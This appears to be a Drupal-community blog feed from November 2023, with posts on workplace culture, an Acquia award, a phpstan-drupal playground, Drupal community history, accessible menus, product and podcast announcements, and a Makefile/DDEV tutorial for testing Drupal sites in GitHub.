“In the past, I’ve had to travel at odd hours on official visits and stay in very unsafe environments. At Axelerant, I get to choose my timing. And the places identified for stay have always been safe. This is something I've really valued. As a woman, I value physical safety each day,” shared Performance Coach Shalini Neelakantan.

Axelerant_Performance_Coach_Shalini_Neelakantan

Hassle-Free Maternity Leave And Rejoining

Yes, we have maternity leave of up to six months, like many other companies.

What’s different is how we approach it, and how would-be mothers taking the leave experience their break. 

And rejoining.

Shefali recognizing Axelerant_s unbiased appraisal system

A pregnancy is the beginning of something miraculous: a new life. 

It’s the beginning of motherhood; a precious period for the team member and her family.

We give our best to ensure that work concerns don’t chip away at that preciousness.

And this intention influences our decisions for people yet to join us, too.

“I got hired here in my first trimester. Companies usually back away from hiring after learning about pregnancies,” said Vishakha Bharnuke, QA Analyst.

For a new mother, work flexibility becomes indispensable. 

And that’s precisely what we try to ensure for a team member returning from maternity leave.

“I was allowed to work flexibly, and peacefully manage my toddler and work. Work-life balance comes so easy with Axelerant,” Vishakha shared.

Vishakha embracing her son

Living Our Core Values Of Openness And Kindness

Axelerant’s core values of Openness, Kindness, and Enthusiasm guide us in everything.

They help us reach decisions that are humane.

“I remember my final round of tech interviews with Shweta (Director of Quality Engineering). During my interview, my one-year-old started being cranky. Shweta considerately paused the interview and asked me to pacify my daughter first,” said Priyasi Singh, QA Analyst.

Decisions that are kind.

Sucheta recognizing Axelerant and her team members for being there for her

Our core values allow us to be open—trusting and treating people respectfully—when most wouldn't.

“I had a tough time dealing with recruiters when returning to work after a career break,” shared Sujatha Varadharajan, Senior Business Analyst.

In one of her interview experiences, the interviewer tossed Sujatha’s resume in the bin and asked her to leave after learning about the break.

“My Axelerant interview was dignified, straightforward, and non-intrusive. I was given a chance to prove myself without being summarily dismissed for taking a career break,” she said.

What Makes An Organization Truly “Great?”

Having systems in place that make peoples’ lives easier is absolutely needed. 

But there are two factors even more essential to building a people-centric organization.

Intention and effort. These two constitute that huge gap between saying and doing, between superficial and life-changing.

And we aim to fill that gap with decisions and actions that empower women team members—and people of all genders and identities—to lead fulfilled lives.

We aren’t the ultimate, perfect example of a great workplace. 

But every time we consciously choose to do right by our people, we are taking one step closer to greatness.

Apply at Axelerant by clicking here. We believe people grow better with kindness and support.
Nov 15 2023
Nov 15

The 2023 Acquia Engage Awards winners were unveiled this morning at Acquia Engage Boston. Third and Grove won the Regional Excellence - North America award, spotlighting our collaboration with Accelera by Cummins. 

Launching a clean energy revolution

The winning submission detailed the launch of accelerazero.com, underscoring Third and Grove’s commitment to helping brands achieve incredible outcomes with Drupal. 

Cummins Inc., a global leader in engine manufacturing, partnered with Third and Grove to showcase its leadership in a new domain: zero-emissions technologies.

With a 412% increase in conversions sitewide, the new platform delivers the speed, security, and flexibility for Accelera by Cummins to face the carbon-free future. See how we did it in our Accelera by Cummins case study. 

As an Acquia Certified Drupal Cloud Practice and Gold partner, Third and Grove carries a decade of experience as a trusted Acquia partner. 

About the Engage Awards 

The Acquia Engage Awards recognize outstanding digital experiences leveraging the Acquia Open DXP.

This year’s competition received many entries spanning a variety of industries and regions in 26 categories. Each submission was presented to a panel of respected digital experts, who evaluated them on functionality, integration, performance, results, overall user experience, and other criteria. 

“Our Engage Award winners shared their most impressive digital experiences with us this year,” said Jennifer Griffin Smith, CMO of Acquia. “We are proud of our customers and partners’ innovative strategies and hard work. We’re excited to celebrate their achievements at Engage Boston.”

Nov 14 2023
Nov 14
Published on Tuesday 14, November 2023

I'm excited to announce a new feature coming to phpstan-drupal that already exists for PHPStan. PHPStan has an online playground to run and test analysis results. Soon, we will have one for phpstan-drupal! The online playground is an extremely useful tool when reporting bugs to PHPStan and will make it easier to report bugs for phpstan-drupal. 

I had thought about building this previously but was concerned about possible costs. After all, phpstan-drupal is a personal open-source project. It was brought up again in the #phpstan channel in Drupal Slack by Dezső Biczó (mxr576.) In great timing, OPTASY recently signed up as an organization sponsor through GitHub Sponsors. I will use these funds to pay for the playground's operating costs. 

When up an running, hopefully by the end of November, the playground will support analyzing code against the latest version of Drupal with PHPStan and phpstan-drupal. Later iterations will allow customizing the version of Drupal used (it's a bit more complicated.)

I emailed Ondřej asking if it was okay to copy the code; even though it's open source, it's always good to ask. Ondřej was also nice enough to disclose that the playground is affordable. The phpstan-drupal playground will probably receive less traffic, but I expect it to have longer execution times. With that, I'm assuming it should fall within a reasonable range.

The playground uses the Serverless framework to deploy to AWS Lambda. The code is broken into three components:

  • playground-runner: Executes sample PHP code with PHPStan configuration and returns the results, not a publicly exposed function.
  • playground-api: Public API, which executes the playground-runner and allows storing results in an S3 bucket for sharing.
  • website: The interface to interact with the playground-api.

I got everything up and running in a few hours with a rough interface. The biggest challenge was getting phpstan-drupal to properly analyze with the drupal/core package in the vendor directory. With a few hacks, it works.

However, there are some quicks. When I passed it the following code, I got the correct deprecation errors:

But, when I sent the following:

loadInclude('node', 'inc', 'node.admin');

It told me that the \Drupal class could not be found! I have some debugging to do.

I also am going to rewrite the playground-api code copied from PHPStan. PHPStan supports testing code from PHP 7.2 to PHP 8.2 and beyond. The phpstan-drupal playground will only run PHP versions supported by Drupal core. I will also need to see if we can support multiple versions of Drupal core. It might result in a few different playground-runner functions. For example, one for 11.x, 10.3.x, and ^10.2.0. We'll see.

Want more? Sign up for my weekly newsletter

Nov 14 2023
Nov 14

Join us on Thursday, November 16 at 1pm ET / 10am PT, for our regularly scheduled call to chat about all things Drupal and nonprofits. (Convert to your local time zone.)

No pre-defined topics on the agenda this month, so join us for an informal chat about anything and everything at the intersection of Drupal and nonprofits.  Got something specific on your mind? Feel free to share ahead of time in our collaborative Google doc: https://nten.org/drupal/notes!

All nonprofit Drupal devs and users, regardless of experience level, are always welcome on this call.

This free call is sponsored by NTEN.org and open to everyone. 

  • Join the call: https://us02web.zoom.us/j/81817469653

    • Meeting ID: 818 1746 9653
      Passcode: 551681

    • One tap mobile:
      +16699006833,,81817469653# US (San Jose)
      +13462487799,,81817469653# US (Houston)

    • Dial by your location:
      +1 669 900 6833 US (San Jose)
      +1 346 248 7799 US (Houston)
      +1 253 215 8782 US (Tacoma)
      +1 929 205 6099 US (New York)
      +1 301 715 8592 US (Washington DC)
      +1 312 626 6799 US (Chicago)

    • Find your local number: https://us02web.zoom.us/u/kpV1o65N

  • Follow along on Google Docs: https://nten.org/drupal/notes

View notes of previous months' calls.

Nov 14 2023
Nov 14

Drupal’s code is itself an expression of the community’s open source values. The code is there for anyone to use, free of charge, and is always evolving as a result of community contributions. That’s substantially different from proprietary software and demonstrates a commitment to collaboration and transparency.

Similarly, Drupal’s evolution is not solely about refining its API or enhancing user interface design – it’s intrinsically linked to shared experiences and mutual learning within the community. DrupalCon allows developers and users from various backgrounds to come together not only to share knowledge about the platform but also to shape the future direction of the software based on collective feedback and diverse needs.

This all means that the story of how Drupal has changed isn’t just about software. It’s also about how we, the community of people who make Drupal possible, understand ourselves.

In this article, we’ll take a look back at the history of Drupal, focusing on the narratives that have shaped the community. In doing so, we hope to provide an insight into the forces that have powered Drupal’s growth and resilience. Furthermore, analyzing the ongoing evolution of these narratives helps illuminate what future shifts may be on the horizon for the Drupal ecosystem.

Looking to the future, we’ll also consider how the community will continue to develop, and why the Open Web Manifesto encapsulates the aspirations this community has expressed for over 20 years. While Drupal itself has kept evolving, what has remained constant is our shared commitment to an open, inclusive, and equitable web.

Sailing on the ship of Theseus

Palantir began using and contributing to Drupal in 2006. Since then, I’ve also served on the Board of Directors of the Drupal Association and helped organize several camps and events. This long perspective has given me some fascinating insights into how Drupal — and its community — have evolved.

When we talk about Drupal, it’s tempting to think about it as the product – as the code itself. But the code that was written in 2001 is not what is running today.

Drupal is like the Ship of Theseus, the subject of a famous thought experiment first written about by ancient Greek philosopher and historian Plutarch. The Athenians wanted to preserve Theseus’s ship, so over many years, they replaced its parts as they wore out, plank by plank. 

The question is: Once all the planks have been replaced, is it still the Ship of Theseus? If it’s not, at what point does it stop being the original ship, and become a replacement? After one plank? After twenty? Or is there a sense of identity the ship possesses that is independent of its parts, related instead to the way people talk about and use it?

For many people, the idea that identity isn’t just about constituent parts helps clarify the paradox. And it also helps shed some light on Drupal. Even if none of the original Drupal code is being used today, a Drupal identity has persisted. This identity doesn’t just stem from one person (not even from Dries!). Rather, Drupal’s special factor has always been its community – all the people who build Drupal and make it work.

It’s the culture -- the values, the assumptions and the beliefs-- of the people sailing on the Ship of Theseus that determine why it’s still the same ship, for all the changes it’s seen.

Drupal is an ecosystem, built by contributors of code and of non-code, backed by an infrastructure hosted by the Drupal Association, supported by businesses, and used by people and organizations to power more than 2% of the top million sites on the web. All of these people coming together make up different parts of the Drupal community – and it’s all of us who really determine what Drupal is, not any specific line of code.

The stories we tell ourselves

The stories we tell ourselves have been a major driver of Drupal’s ability to achieve ongoing success and remain resilient as a decentralized, global and volunteer-based open-source project. They are narratives that tie together the hundreds of thousands of contributors over Drupal’s history.

These shared stories reflect Drupal’s culture. And what they show is that our culture has been substantially shaped by non-code contributions from businesses and individuals — more so than by the code itself.

Let’s consider three key narratives that have shifted over time to gain an insight into the forces that have powered Drupal’s growth and resilience.

Eat your own dog food? No, get off the Drupal island!

“Dogfooding” is a term used for the practice in which tech workers use their own product consistently to see how well it works and where improvements can be made.

In the early days of Drupal, there was a strong ethos of “eating your own dog food” — building tools for the community’s needs using Drupal itself. With Drupal as their hammer, contributors approached many tasks as nails that could be driven home by extending Drupal.

Much of this was born of necessity in the absence of alternatives. Drupal provided the Groups module for community interaction before social media existed. The Project module enabled collaboration before Git. Local Drupal camps relied on homegrown event management systems like COD. The Drupal Association itself was formed partly to provide infrastructure after early infrastructure failures.

Over time, however, the Drupal community embraced integrating with external tools better suited for certain tasks. Infrastructure moved to Git and Slack. Camps adopted specialized event registration systems. Core adopted the Symfony framework.

While retaining its innovative spirit, Drupal evolved to focus on its strengths, looking to other technologies to inspire and augment its capabilities. The narrative shifted from an insular “eat your own dogfood” to a more outward-looking “get off Drupal island.” The big tent expanded to include complementary tools, acknowledging that Drupal need not solve every problem alone.

This evolution demonstrates the community’s pragmatism and maturity. By recognizing external solutions, contributors avoid reinventing the wheel. The new narrative reflects a holistic understanding of how Drupal fits into the broader technology landscape.

Talk is silver, code is gold? No! Come for the code, stay for the community.

In the early days of Drupal, the dominant narrative was “talk is silver, code is gold” — only contributions to the codebase mattered. However, over time the community realized the interplay between community-focused activities and code contributions provided mutual benefit. Research shows community participation expands social ties, shapes strategy, and focuses innovation, even without directly affecting code productivity.

Drupal’s evolution reflects the growing appreciation of community-oriented work. Adoption of a Code of Conduct for events marked increased investment in healthy interactions. The creation of the Community Working Group demonstrated the importance of conflict resolution. Rewriting the Code of Conduct in plain language and forming a Community Health Team required tremendous time and emotional labor — but is strong evidence of the value now placed on community. Local Drupal communities now actively collaborate. Shared playbooks spread knowledge and regions like Europe brought back DrupalCon.

The narrative has now shifted from “talk is silver, code is gold” to “come for the code, stay for the community”. This underlines how vital non-coding work is in enabling Drupal’s success.

Scratch your own itch? No, if you want to go far, go together!

Early Drupal embodied the “scratch your own itch” ethos — solve your own problems and build what you need. Drupal was likened to a box of Legos: you could find many disparate pieces, and sometimes there were instructions on how to build with them. But if you couldn’t find what you wanted, you’d have to come up with your own design.

This attitude combined with what we might call a “benevolent dictator for life” model, whereby community members felt they needed permission from Dries before undertaking anything major. Indeed, many sought intervention from Dries across code, governance, and conflict resolution, developing unhealthy hierarchical expectations. Disagreements often devolved into “epic bikeshedding”, resulting in exhausting debates where the most stubborn prevailed unless a particular argument caught Dries’s attention.

As the community grew, this proved unsustainable. While some called for more hierarchy, Drupal resisted a full leadership structure. Code may have correct answers, but people and social issues are messy. Extending hierarchical expectations to non-code contributions risked grinding everything to a halt, replicating the “bikeshedding” debates.

Instead, Drupal evolved from “scratch your own itch” individualism towards “if you want to go far, go together” collaboration. This new era saw greater coordination through strategic initiatives and working groups. These collective efforts enabled tackling challenges at scale rather than relying solely on individual contributors. Work could be distributed across many hands to achieve impact not possible alone.

Another major non-code innovation was the contribution credit system. Traditional open source celebrated individual contributors and their achievements. But Drupal needed to accommodate organizations like governments wanting collective credit.

Rather than giving organizations direct commit access, Drupal pioneered contributors claiming credit for their organizations. This preserved individual recognition while tracking organizational impact. Crucially, the system included non-code work from the start.

Though imperfect, contribution credits surface essential non-coding activities like documentation, mentoring, and event organizing. Granting visibility makes the work more valued. It says all contributions, not just code, are worthy of recognition.

Businesses have also collaborated to provide infrastructure, funding, and other resources for collective benefit. 

Future projections: Networked, regenerative, listening

As Drupal continues to evolve, three potential paths forward emerge from these past narratives. These point to a future in which Drupal will become more networked, more regenerative, and will invite even more community listening.

  • Networked
    Past centralized coordination efforts brought much-needed structure but also new complexities. Consensus and decision-making become challenging at scale.

    In the future, a compromise solution will exist in the form of networking — decentralized creative partnerships and empowered teams tailored to specific needs. Breaking down work into smaller scopes makes problems more tractable, shifting the mindset from scarcity and exclusivity to abundance and inclusion. Creative partnerships facilitated through the Drupal Association can promote consent-based and “safe to fail” decision-making, while flexible contribution models will allow individuals and businesses to smooth resource constraints.
     

  • Regenerative
    Drupal creates tremendous value but cannot fully capture or distribute it equitably. Anti-patterns of exploitation and burnout persist, disproportionately affecting core contributors.

    To sustain success, Drupal must encourage, enable, and recognize pro-community actions. It must also differentiate which parts of the ecosystem are public goods that anyone should be able to use for free, and which are more akin to commons — that is, to areas that require a degree of care and input from those using them. Not all of Drupal’s major cost centers are public goods.

    Strengthening organizational protocols, growing leadership pipelines, planning for transitions, and sharing knowledge will make the ecosystem more sustainable and resilient without being exclusive. Regenerative practices that distribute effort and reward more equitably will reduce burnout. The result is a system built to thrive through ongoing renewal of its most vital asset — engaged contributors.
     

  • Listening
    Getting off the island helped make us aware of the bigger picture. We need to think globally before we act locally.

    This means tending to the Drupal ecosystem by structuring for flexibility. Accommodating different contributor types enables pioneers, maintainers, and coordinators to play their roles. The Drupal Association ought to act as a kind of town planner.

    At the same time, we must also shape the external landscape by collaborating with other open source communities. Providing feedback on policies like the EU Cyber Resilience Act makes the terrain more hospitable for open source as a whole. Listening through participation in the open web movement will help contextualize Drupal’s place and influence. It allows acting both locally and globally — solving immediate needs while advancing the broader open technology ecosystem.

The Open Web Manifesto

Like any living system, Drupal must continuously adapt while remaining true to its core values. The Open Web Manifesto articulates Drupal’s commitment to an open, decentralized, inclusive web built on freedom and participation.

The manifesto declares the Open Web a cause driven by principles, not just technology. It must be permissionless, letting anyone contribute. No single entity controls it. The Open Web welcomes all as users, creators, architects, and innovators regardless of identity or status. Sustaining it requires deliberate, collaborative effort.

Drupal sustains the Open Web through its creativity, diversity, and integrity. Its global community puts open source collaboration into practice, introducing participatory digital experiences. This empowers Drupal's partners, contributors, and users alike.

By remaining true to its ethos while adapting to a changing world, Drupal can keep shaping an equitable digital landscape. The narratives that brought Drupal this far — from independence to interdependence, visibility to value, and co-opetition — point towards an even more vibrant, resilient and regenerative future. 

If Drupal continues listening to its community’s needs while engaging with the global ecosystem, it can flourish for decades to come as a thriving open source leader empowering people to build a better web.

Cropped version of Drupalcon 2009 - Paris - 17 by Chris Heuer licensed under CC BY-NC-SA 2.0 DEED.

Nov 14 2023
Nov 14

It's a standard component:

a menu where the user can hover over a top-level menu item to see its submenu

Almost every one of our clients has requested a variation of this at the top of every page of their website. Starting with Drupal 7, we became accustomed to a specific toolset for building these. There were lots of options, mobile support, and everything worked from our perspective and our client's perspective. But our menus had a bias towards visual users with a mouse. The words "hover" and "see" were in the definition of the component, actions only a subset of users can accomplish. Accessibility and inclusivity need to start at the roots, so we redefined the component:

a menu where each top-level menu item has a submenu that the user can choose to navigate

With this definition, it became obvious the component was broken for keyboard users, because they did not have a choice. Using a keyboard to navigate through menu links meant tabbing through every single submenu. So how do we do this better?

We started by looking at recommendations from the WAI Authoring Practices Guide and found the Disclosure Navigation Hybrid Menu. This component simply adds a toggle button to open submenus. Now all users have a choice.

a menu with a submenu toggle buttona menu with a submenu toggle button

Re-handling Hover

With the basic interface set, we needed to re-add the hover navigation. But this created a conflict. If a user hovers over the toggle button, the submenu should open. If a user clicks the toggle button, the submenu should toggle. So if a user hovers over a toggle button and clicks it, then the submenu is toggled open and immediately toggled shut. Here are some solutions we've built to resolve this behavior:

  1. Keyboard only: the toggle button can only be triggered by keyboard, not pointer devices.
  2. Only open: clicking the toggle button only opens the submenu.
  3. Hide until focused: visually hide the toggle button until it receives tab focus, so pointers can't access it by default.

Leveraging the Full-stack in Drupal

When rebuilding this component, we looked at existing Javascript libraries, but kept running into the same issues. Either they were so opinionated about the HTML that it was difficult to template in Drupal, or they were so generic that they were inconsistent and hard to customize. Finally we realized that we could write the template and Javascript in tandem and created a customizable component with less than 200 lines of Javascript and no external dependencies. In fact our accessibility standards actually made the functionality easier to code with the aria-controls and aria-labelledby attributes. For example, a toggle button for a submenu would have an aria-controls attribute set to the ID of the corresponding submenu, and the submenu would have its aria-labelledby attribute set to the ID of the toggle button. This is necessary for screen readers to communicate connections between elements that can't be seen, but it also makes it trivial to code the toggle interaction. Other libraries often create data-models of the menu to track these connections, but that's not necessary when everything is explicitly defined in the HTML. The only issue is generating unique ID's for all the toggles and submenus. But Drupal makes this easy for us with its HTML utility class which provides a simple getUniqueId method. And now in Drupal 10.2 there's a clean_unique_id function for Twig templates. 

Contribution

And once all of that was figured out, we gave the component back to Drupal and, thanks to the community, made it stable and secure. So the next time a client needs a complex menu without losing accessibility, load up Disclosure menu and see if it fits your needs. If not, file an issue and let's make it better for everyone.

Nov 13 2023
Nov 13

We're excited to announce the upcoming launch of DXPR Builder 3.0.0, expected around the turn of the year, marking a significant step towards the future of no-code editing for professional content teams. This release is not just an upgrade; it's a transformation that balances the needs of Drupal content editors-users with the strategic goals of large organizations.

Seamless Drual 10 Integration: CKEditor 5

For content marketers, DXPR Builder 3.0.0 brings a significant upgrade with the migration from CKEditor 4 to CKEditor 5. This enhancement ensures a more intuitive editing experience, allowing content teams to focus on creativity and efficiency.

Thanks to CKEditor 5's plugin architecture we can integrate the editor with Drupal, as well as with the Bootstrap 5 framework. For example, we're ensuring every table inserted with the text editor is a mobile-responsive Bootstrap table.

Mobile Editing: On-the-Go Flexibility

Previewing the future of mobile editing, DXPR Builder 3.0.0 transforms the way professional content teams work. This release will make it possible for the first time in Drupal to have a full-fledged mobile editing experience, offering unprecedented flexibility and on-the-go editing capabilities, enhancing the Drupal content management ecosystem.

Font Awesome 6: A Richer, Future-Proof Icon Set

Transitioning to Font Awesome 6, we're offering a richer set of icons, ensuring that your marketing materials stay fresh and relevant. This update, while keeping backward compatibility, reflects our commitment to providing tools that scale with your organizational needs.

Intuitive Content Management with Skeleton/Wireframe View

The new skeleton/wireframe view mode is designed to streamline the management of complex elements, catering to the needs of dynamic content teams in large organizations. This feature simplifies the reordering process, enhancing the overall efficiency of content creation.

It allows for easy re-ordering of elements that can currently be a bit harder to drag and drop, like large sections. This update will make it possible for the first time to re-order slides within carousels.

Backward Compatibility: A Smooth Transition

Understanding the importance of continuity, we ensure a smooth transition with backward compatibility for CKEditor 4 content and Font Awesome icons. This approach minimizes disruption, allowing your team to adapt without sacrificing productivity.

Thanks to CKEditor 5's recent updates in backward compatibility we expect a painless migration process we no need for database updates on your content.

Why DXPR Builder 3.0.0 is Ideal for Your Organization

DXPR Builder 3.0.0 is designed to align with the strategic objectives of large organizations. It offers scalability, enhances productivity, and ensures that your content marketing team has the most advanced tools at their disposal. The upgrade to DXPR Builder 3.0.0 is more than an improvement in technology; it's an investment in your organization's future.

Want to explore DXPR's no-code and low-code Drupal experience? Try our online demo or install our Drupal StarterKit which saves you hundreds of hours with a pre-configured DXPR Drupal set-up.

Stay Tuned: As we approach the release date, we are eager to unveil more features that align with our vision of the future of mobile editing for professional content teams. We're committed to empowering your organization with innovative tools that redefine digital storytelling and content creation.

Nov 13 2023
Nov 13

Today we are talking about the Web Sustainability Guidelines, How sustainability applies to the web, and how your website can be more sustainable with guests Mike Gifford and Andy Blum. We’ll also cover LB Plus as our module of the week.

For show notes visit:
www.talkingDrupal.com/424

Topics

  • What are the Web sustainability guidelines
  • Do they only apply to environmental impact
  • When we think about sustainability we think of funding, does WSG speak to that
  • Why are the WSG important
  • What is the best way to implement WSG
  • How do the WSG’s apply to Drupal
  • Have the WSG’s been finalized
  • Are they open source
  • How can someone get involved

Resources

Guests

Mike Gifford - mgifford.medium.com @mgifford

Hosts

Nic Laflin - nLighteneddevelopment.com nicxvan
John Picozzi - epam.com johnpicozzi
Melissa Bent - linkedin.com/in/melissabent merauluka

MOTW

Correspondent

Martin Anderson-Clutz - @mandclu
Layout Builder Plus

  • Brief description:
    • Have you ever wanted to make Layout Builder easier and more intuitive for content creators? There are a few modules that can help with that, but today we’re going to talk about one called Layout Builder Plus
  • Brief history
    • How old: Originally created in Apr 2022
    • Versions available: 2.0.1 release, compatible with Drupal 10 and 11
  • Maintainership
    • Actively maintained, latest release just a week ago
    • Number of open issues: 2, both bugs, but both marked as fixed
  • Usage stats:
  • Maintainer(s):
    • Tim Bozeman of Tag1
  • Module features and usage
    • Provides an overhaul of the Layout Builder UI, to make it easier for content creators:
    • Show a curated list of promoted blocks with icons, with lesser-used blocks available in a separate tab
    • Once a block is placed it shows automatically generated content, instead of asking the user to fill out a form before they can see what it will look like
    • Editing the content of a block happens in an overlay instead of the settings tray, so it can use more of the screen
    • Moves the Save Layout and other action buttons to the bottom of the page
    • Also adds some nice capabilities to Layout Builder, including:
    • Drag and drop entire sections
    • Change the layout of an existing section, even if it has blocks in it
    • Clone and update existing blocks
    • Finally, it includes a submodule to integrate with the Section Library module, which allows for a section within a layout to be saved so it can be reused again and again
    • I’ll also note that this is a module nominated by one of our listeners in the #talkingdrupal channel of the Drupal slack workspace, so if there’s a module you’d like to hear about in this segment, drop us a note in there
Nov 13 2023
Nov 13

Ever needed to create a "decision tree" or "Smart Answers" feature and didn't know where to start? It's pretty easy if you use Drupal's webform module and add conditional handlers for the confirmation settings (all through a few clicks in the webform UI).

Creating a decision tree is quite easy using the Drupal Webform UI. Here's the outline:

Nov 13 2023
Nov 13

Task

One of ADCI Solutions’ clients is an American window and door manufacturer. The client needed an unusual feature: depending on the user's geolocation, the content on the website had to change slightly.

Geo-dependent content is a type of website content that changes depending on the user's location.

For instance, in hot Texas, a black window casement will heat up very quickly. This is why it is not available for ordering in this state. Another example: buyers from some states will not find a certain window series on the website because it is not manufactured there. All combinations are set in the admin panel.

how to implement geo-dependent content

How the feature is usually implemented

To dynamically change a site element, a rule is set on the backend. If the user's geolocation matches the geolocation specified in the rule, some part of the content on the newly loaded page changes or disappears.

The problem is that this kills the cache of the element, block, or, in the worst case, the entire page. This means that the user has to wait for the page to load again, although it could have simply been accessed from the cache.

content geo-dependency

How we did it

We wrote the Front-end Modifier module for working with geo-dependent content. It is built with JavaScript and implemented on the user side, bypassing the cache.

All geolocation-sensitive elements are hidden by default. As the page loads, only elements that are relevant to this geolocation appear, while irrelevant ones remain hidden. This way, we avoided poor UX. Usually, when the page loads, all elements flicker, and if the user notices an element that does not eventually appear on the page, it confuses him or her.

With the Front-end Modifier, we set rules, for example, to hide a window series for certain regions, replace this or that element, etc. When the page is loaded, the rule is loaded along with it and sorts the selected elements using JS. The module concept can be reused on other projects if the client knows exactly by what criteria they want to classify goods or services and what content to show and hide depending on known conditions.

geo-dependent content on drupal

Manual geolocation input

We allow site users to change geolocation manually in case they need to order window installation in another city.

Imagine: a user from New York goes on vacation to San Francisco. There, they decide to order new windows for their home. By default, they will be taken to a site aimed at California residents. All the user needs to do is enter their home zip code in a special box, and they will be redirected to their “home” website.

The function is implemented using custom code, which determines the location through cookies, filters site elements, etc.

Nov 12 2023
Nov 12

There are a number of different tools that allow you to validate and test a Drupal site. Inspecting your custom code allows you to adhere to coding standards and ensure that you stamp our common coding problems. Adding tests allows you to make certain that the functionality of your Drupal site works correctly.

If you have tests in your Drupal project then you ideally need to be running them at some point in your development workflow. Getting GitHub to run the tests when you push code or create a pull request means that you can have peace of mind that your test suite is being run at some point in workflow. You also want to allow your tests to be run locally with ease, without having to remember lots of command line arguments.

In this article I will show how to set up validation and tests against a Drupal site and how to get GitHub to run these steps when you create a pull request. This assumes you have a Drupal 10 project that is controlled via composer.

Let's start with creating a runner using Makefile.

Makefile

A Makefile is an automation tool that allows developers to create a dependency structure of tasks that is then run by using the "make" command. This file format was original developed to assist with compiling complex projects, but it can easily be used to perform any automation script you need.

For example, let's say that we want to allow a command to be run that has a number of different parameters. This might be a curl command or even an rsync command, where the order of the parameters are absolutely critical. To do this you would create a file called "Makefile" and add the following.

sync-files:
	rsync -avzh source/directory destination/directory

To run this you just need to type "make" followed by the name of the command.

make sync-files

You now have a repeatable task that will run a set bash script exactly the same way every time.

This is preferable to creating single shell scripts that run each action as with Makefile you can create dependencies for each of your tasks. So, in the above example we could say that before we run the rsync command we need to create the destination directory. All we have to do is create another task that will perform this action and set this as a prerequisite of the sync-files command.

create-destination-directory:
    mkdir -p destination/directory

sync-files: create-destination-directory
	rsync -avzh source/directory destination/directory

One thing I use a quite often is the "@" symbol at the start of the commands. This tells make to run the command, but not to print out the command being run on the command line. This cleans up the output a little, but is is down to personal preference really. Here's the same rsync command with this option added.

sync-files:
	@rsync -avzh source/directory destination/directory

There's a lot more to Makefiles than I can cover here, but this is essentially the basic setup. Whilst it is a little tricky to get into the syntax of a Makefile they can be useful for quickly running tasks that would otherwise mean looking up parameters or copying from a text file of useful commands.

If you want to know more about make then I can recommend reading https://makefiletutorial.com/ as this will take you through all of the syntax of a Makefile in simple to understand examples.

The idea behind using Makefiles here is to simplify the process of running commands on GitHub, but also to make it easier for developers to run the same commands. Makefiles makes it easy to group everything under a single command using the prerequisites feature. Doing this will allow you to install Drupal and run entire testing stack using just a single command.

Alternatively, you can use composer actions or some other automated script to perform the tasks, although composer actions don't support dependencies so you might need to create a series of bash scripts to perform the actions. It's also possible to use something like Robo to run tasks for you, and I have experimented with this in the past. Ultimately, you need some way of installing your PHP dependencies before you can run them, which means you need a Makefile or script somewhere in your workflow.

Whatever technology you select, the key to simplifying your GitHub workflows is weighting the commands more on the Makefile side, which means your GitHub actions can be nice and concise.

DDEV

In order to simplify the tasks being run (and the environment they are run on) I tend to use DDEV. Using this platform allows for a consistent and repeatable environment that you can easily configure to have different setups. The rest of the examples in this article will feature the "ddev" command (where appropriate) that will execute the command within the docker environment created by DDEV.

Using a docker environment also means that all of the paths for the system will be the same on every machine that runs the environment, which helps to simplify the setup process.

DDEV is useful when you want to perform updates and need to ensure that they function correctly. For example, if you want to see if your site will function on a new version of PHP then you just need to make that change in the configuration and create a pull request. The GitHub actions will find the new configuration and perform your tests with the new version in mind.

Install Drupal

The first task to perform with any setup is to install the Drupal, first by installing the composer packages and any node packages we may require. When we start a DDEV environment it will automatically copy the Drupal settings.php file into the correct place, so we don't need to worry about that here.

Once the Drupal codebase is in place you can then install Drupal and compile any theme assets required. The following make command will install composer and node packages and then hand off the Drupal install and theme compile tasks to secondary make commands.

setup-drupal:  ## Install dependencies, install Drupal, and compile the theme.
	@ddev composer install --prefer-dist --no-progress
	@ddev exec --dir=/var/www/html/docroot/themes/custom/my_custom_theme npm install
	@ddev exec npm install
	$(MAKE) site-install
	${MAKE} themebuild

The site install command will install Drupal using Drush. I have found from experience that dropping and re-installing the database entirely helps ensure that the environment is clean. For example, when running migration tests you might find that if you don't drop all tables first then some of the migration tables will be present after you re-install the site. We also perform a cache clear as well as an additional configuration import to make sure that the site is up to date.

site-install: ## Install the Drupal site.
	@ddev drush sql-drop --yes
	@ddev drush si standard --existing-config --yes --account-name=admin --account-pass=admin
	@ddev drush cr
	@ddev drush cim -y

This does assume that you are using the standard install profile to install your site (not always the case) and that you have some configuration to import. If you are using multi-site setups then you'll need to change this to install one or more variants of the site for testing.

Once that task is complete the Drupal site will be running.

It's at this point that you might want to think about using Default Content Deploy to inject some testing content into your site. This isn't a requirement, except if you are going to perform any behavioural or regression testing on the site. Having content present for these types of test is essential and Default Content Deploy is the best way that I have found to do this.

The final step here is to build the theme assets, which will entirely depend on what package you use to manage your theme. I use grunt on a couple of projects so this is an example of using grunt to compile the theme assets.

themebuild: ## Build the theme.
	@ddev exec --dir=/var/www/html/docroot/themes/custom/my_custom_theme npx grunt

I should note that there's no extra installation steps to be performed before we can run npm or npx as it these packages come pre-installed with DDEV.

Validation

Before we start testing the code we need to make sure that it is valid. I normally separate out the validation and the testing workflows as there is no point in wasting time on running a full test suite if some of the code in your codebase is invalid.

There are a number of things we can do to ensure that a Drupal codebase is valid, starting with validating the composer files.

Composer Validate

The simplest validation task we can run is to validate the main composer.json and composer.lock files, which is achieved with the command "composer validate".

composer-validate: ## Validate Drupal composer.json and composer.lock.
	@ddev composer validate

Having invalid composer files can often mean that something went wrong during the composer workflow and can cause problems later down the line when you attempt to update composer packages again. 

PHP Code Sniffer

PHP Code Sniffer allows you to check your Drupal custom code for Drupal coding standards. There's a lot of reasons why you want to use coding standards in your project, the least of which is to ensure that common bugs and security issues are corrected before they reach your production environment. PHP Code Sniffer will also check your Drupal YAML configuration files to ensure that no common issues are found.

To install PHP Code Sniffer on a Drupal codebase you can follow along with my article detailing how to install and run the tool.

Once installed you can run the phpcs command to inspect your Drupal codebase. As this requires a fair amount of arguments to achieve we create a make command to do this for us.

phpcs: ## Run phpcs analysis.
	@ddev exec vendor/bin/phpcs --standard=Drupal,DrupalPractice --exclude=SlevomatCodingStandard.Namespaces.AlphabeticallySortedUses --extensions=php,module,inc,install,test,profile,theme,info,txt,yml --ignore=node_modules,bower_components,vendor web/modules/custom web/themes/custom web/profiles

Remember that we are only interested in the PHP code we have written ourselves, which means we specifically point the phpcs command at our custom codebase. There's no point in inspecting the entire Drupal core and contributed codebase as this will have already been checked by the tools available on drupal.org.

